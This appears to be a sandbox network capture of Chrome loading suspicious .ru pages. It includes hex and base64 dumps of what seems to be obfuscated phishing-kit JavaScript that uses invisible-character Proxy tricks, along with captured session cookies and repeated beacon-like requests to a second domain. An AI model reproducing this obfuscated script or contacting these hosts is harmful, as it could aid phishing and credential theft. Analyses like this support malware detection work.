                                                    2025-03-28 12:42:55 UTC1369INData Raw: 38 74 63 32 56 73 5a 57 4e 30 61 57 39 75 65 79 31 33 5a 57 4a 72 61 58 51 74 64 47 39 31 59 32 67 74 59 32 46 73 62 47 39 31 64 44 70 75 62 32 35 6c 4f 79 31 33 5a 57 4a 72 61 58 51 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 61 32 68 30 62 57 77 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 62 57 39 36 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 4c 57 31 7a 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 58 31 41 4c 58 64 6c 59 6d 74 70 64 43 31 72 5a 58 6c 6d 63 6d 46 74 5a 58 4d 67 63 47 39 77 65 7a 41 6c 65 33 52 79 59 57 35 7a 5a 6d 39 79 62 54 70 7a 59 32 46 73 5a 53 67 77 4b
                                                    Data Ascii: 8tc2VsZWN0aW9uey13ZWJraXQtdG91Y2gtY2FsbG91dDpub25lOy13ZWJraXQtdXNlci1zZWxlY3Q6bm9uZTsta2h0bWwtdXNlci1zZWxlY3Q6bm9uZTstbW96LXVzZXItc2VsZWN0Om5vbmU7LW1zLXVzZXItc2VsZWN0Om5vbmU7dXNlci1zZWxlY3Q6bm9uZX1ALXdlYmtpdC1rZXlmcmFtZXMgcG9wezAle3RyYW5zZm9ybTpzY2FsZSgwK
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 37 43 6d 4e 76 62 6e 4e 30 49 48 42 79 62 33 68 35 49 44 30 67 62 6d 56 33 49 46 42 79 62 33 68 35 4b 48 74 39 4c 43 42 34 55 58 52 55 54 58 56 51 55 55 5a 76 4b 54 73 4b 63 48 4a 76 65 48 6c 62 49 75 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f
                                                    Data Ascii: 7CmNvbnN0IHByb3h5ID0gbmV3IFByb3h5KHt9LCB4UXRUTXVQUUZvKTsKcHJveHlbIu++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oO++oO
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
                                                    Data Ascii: oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO+
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b
                                                    Data Ascii: O++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                                    Data Ascii: OFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++o
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f
                                                    Data Ascii: +oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oO++oO++oO
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
                                                    Data Ascii: pO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO+
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b
                                                    Data Ascii: OOFpO++oO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.549752172.67.166.1204436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:55 UTC1327OUTGET /favicon.ico HTTP/1.1
                                                    Host: fgof.koxicarev.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://fgof.koxicarev.ru/zXMKsj/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cookie: XSRF-TOKEN=eyJpdiI6InRYVkFRN3NVU1VDQ3kzcmYwYVhjcUE9PSIsInZhbHVlIjoiOHB2QVdzZ2NDMVZOZ1NLTTlpUWNFcVlLVXE4dDJjWS8xQ0V1R29SYVFmNjNUK0YremFLRG1RNUZqT2ZqWTlORFBPcXFtYUh5TFN6L1VqQXcwaDNNUTBqWnJuaFlHRThaUFNuU1VxaHpvUWZnR2NWa2hkWGxFQnlDdGFGM0tzVnQiLCJtYWMiOiI5Yjc1ZjM5MThiNzczYTUwMzMxZjdhMzcyYTBmYWYyNGI2Nzc1ZWU3NmU2ZTU5N2IwZDliYWI4NTY4NTI5NmZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlNrSkhYU0dVTGhxNU55bWpjL0wySUE9PSIsInZhbHVlIjoiR1VvSityR0Z3T1NXazE5TUkzY0dUVTc3UklPQkFmd2piTmJoeWpXNHJVMEdSVHlRUldwOGZ5RU5tLzB2R1NZL2Fzd1F1NnFpdFViQnZXTmp2UG1nNHE2WXVJYkJRUEI0b0hzTEhYY1JVai9ySXZXdkQ0ZlNQL0hsNytuQkJYMzciLCJtYWMiOiIyYWE5YzIxMmEyMGExMmE0OGMwNTFkYjMxY2RhYmYxYzYzOTRhNjgzOTgyOWE5NzM3NmY3ZDU5MTU4MzU2NzIxIiwidGFnIjoiIn0%3D
                                                    2025-03-28 12:42:56 UTC1082INHTTP/1.1 404 Not Found
                                                    Date: Fri, 28 Mar 2025 12:42:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=14400
                                                    cf-cache-status: HIT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=24410&min_rtt=10068&rtt_var=17927&sent=107&recv=49&lost=0&retrans=1&sent_bytes=113511&recv_bytes=6638&delivery_rate=1882865&cwnd=111&unsent_bytes=0&cid=7c5043c8bef34e9a&ts=458424&x=0"
                                                    Age: 8628
                                                    Server: cloudflare
                                                    CF-RAY: 927735d3fb894386-EWR
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=90033&min_rtt=89796&rtt_var=19300&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1899&delivery_rate=33764&cwnd=252&unsent_bytes=0&cid=957119c2b1bbfb90&ts=1040&x=0"
                                                    2025-03-28 12:42:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.54975435.190.80.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:56 UTC542OUTOPTIONS /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Origin: https://fgof.koxicarev.ru
                                                    Access-Control-Request-Method: POST
                                                    Access-Control-Request-Headers: content-type
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:56 UTC336INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-max-age: 86400
                                                    access-control-allow-methods: OPTIONS, POST
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: content-type, content-length
                                                    date: Fri, 28 Mar 2025 12:42:56 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.54975535.190.80.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:56 UTC517OUTPOST /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 432
                                                    Content-Type: application/reports+json
                                                    Origin: https://fgof.koxicarev.ru
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:56 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 67 6f 66 2e 6b 6f 78 69 63 61 72 65 76 2e 72 75 2f 7a 58 4d 4b 73 6a 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 36 36 2e 31 32 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                    Data Ascii: [{"age":1,"body":{"elapsed_time":105,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://fgof.koxicarev.ru/zXMKsj/","sampling_fraction":1.0,"server_ip":"172.67.166.120","status_code":404,"type":"http.error"},"type":"network-erro
                                                    2025-03-28 12:42:56 UTC214INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-allow-origin: *
                                                    vary: Origin
                                                    date: Fri, 28 Mar 2025 12:42:56 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.549756104.21.96.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:43:09 UTC568OUTGET /kabutar@sp5p7o HTTP/1.1
                                                    Host: zh1od.idmquc.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: */*
                                                    Origin: https://fgof.koxicarev.ru
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://fgof.koxicarev.ru/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:43:09 UTC828INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:43:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zU%2FAPiaA%2BFE%2BBlQ4qKvbEna0WJYzGVepfVwIcImMhhkvdFkkdk%2FlqEgGzWxexmDGjGb4wMV7OKXCqVZdRSUULSqoHUy9CvYeghAzbpzxFfrJZebDTio%2BCjRsNV8r0%2FZb5D0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 9277362688f415cb-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=89846&min_rtt=89009&rtt_var=19599&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1140&delivery_rate=34308&cwnd=235&unsent_bytes=0&cid=5802a3d0834252ea&ts=803&x=0"
                                                    2025-03-28 12:43:09 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                    Data Ascii: 11
                                                    2025-03-28 12:43:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.549757104.21.96.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:43:10 UTC393OUTGET /kabutar@sp5p7o HTTP/1.1
                                                    Host: zh1od.idmquc.ru
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Sec-Fetch-Storage-Access: active
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:43:11 UTC819INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:43:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9fB4UBlVgvH6GkRiFuF123446dCswVZt6ZqzuOEbvuLZjQTs8wX9zPHfLj%2FNs6CSgb%2F7AlqMzueKD5dzLuELvBt1yRQp3b7eAHnEwBg2Nc2RC2wrtIT4NRbeXM4GZvHaGI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 9277362d5e51a67e-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=89509&min_rtt=89332&rtt_var=19013&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=965&delivery_rate=34207&cwnd=252&unsent_bytes=0&cid=bc29bb7e1d762c2c&ts=915&x=0"
                                                    2025-03-28 12:43:11 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                    Data Ascii: 11
                                                    2025-03-28 12:43:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.549760104.21.96.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:43:17 UTC568OUTGET /kabutar@sp5p7o HTTP/1.1
                                                    Host: zh1od.idmquc.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: */*
                                                    Origin: https://fgof.koxicarev.ru
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://fgof.koxicarev.ru/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:43:18 UTC818INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:43:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    cf-cache-status: DYNAMIC
